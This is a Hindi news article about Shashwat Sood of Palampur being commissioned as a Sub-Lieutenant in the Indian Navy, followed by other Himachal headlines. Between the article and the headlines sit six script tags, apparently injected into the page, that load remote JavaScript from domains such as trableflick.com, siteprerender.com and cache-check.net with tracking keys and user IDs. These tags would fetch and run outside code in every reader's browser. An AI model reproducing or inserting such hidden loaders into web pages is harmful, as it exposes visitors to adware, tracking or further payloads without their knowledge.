<p>जिला कांगड़ा में पालमपुर के शाश्वत सूद ने भारतीय नोसैना में बतौर सब-लेफ्टिनेंट नियुक्त होकर हिमाचल के साथ -साथ अपने गांव, शहर और माता-पिता का नाम रोशन किया है। उन्होंने डीएवी पालमपुर से मैट्रिक और चंडीगढ़ में ऐलेन इंस्टीच्यूट से प्लस टू की पढ़ाई के बाद जुलाई 2016 में एनडीए में सिलेक्ट हुए।</p>
<p>महाराष्ट्र के पुणे खड़कवासला और केरल में चार साल तक ट्रेनिंग के बाद शनिवार को केरल में हुई साधारण पासिंग परेड में शाश्वत को भारतीय नौसेना में बतौर सब-लेफ्टिनेंट नियुक्ति किया गया, जो पहली भारतीय नोसैना के मुख्यालय कोच्चि केरल में अपनी प्रथम सेवाएं देंगे।</p>
<p>गौरतलब है कि कोरोना संकट के कारण शाश्वत के माता-पिता और रिश्तेदार पासिंग परेड में शामिल नहीं हो पाए। शाश्वत सूद के पिता इंजीनियर अशोक सूद कृषि विश्वविद्यालय पालमपुर से बतौर अधिशाषी इंजीनियर रिटायरड हुए हैं और माता नीलम सूद पंजाब नेशनल बैंक पालमपुर में अधिकारी के रूप में अपनी सेवा दे रही हैं। शाश्वत की दो बहनें इंजीनियरिंग करके कंपनियों में सेवाएं दे रही हैं।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://trableflick.com/optout/set/lat?jsonp=__mtz_cb_687003328&key=21aca573d498d25317&cv=1592204324&t=1592204323853″ type=”text/javascript”></script>
<script src=”http://trableflick.com/optout/set/lt?jsonp=__mtz_cb_768125140&key=21aca573d498d25317&cv=279646&t=1592204323853″ type=”text/javascript”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1592204323858″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
Shimla: सामाजिक न्याय एवं अधिकारिता विभाग ने राज्य चयन आयोग की सिफारिशों के आधार…
Shimla : हिमाचल प्रदेश में स्ट्रीट वेंडर्स को लेकर विधानसभा की ओर से कमेटी…
Hamirpur: मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू के गृह जिले के मुख्यालय हमीरपुर शहर की…
टांडा मेडिकल कालेज भी स्वास्थ्य क्षेत्र में निरंतर नए आयाम कर रहा स्थापित विश्व…
वर्तमान में प्रिंसिपल के 500 पद है खाली लेक्चरर्स की 90:10 की मांग का…
Shimla: रोहडू की रहने वाली 22 वर्षीय अनुष्का दत्ता मिस यूनिवर्स इंडिया 2024 प्रतियोगिता…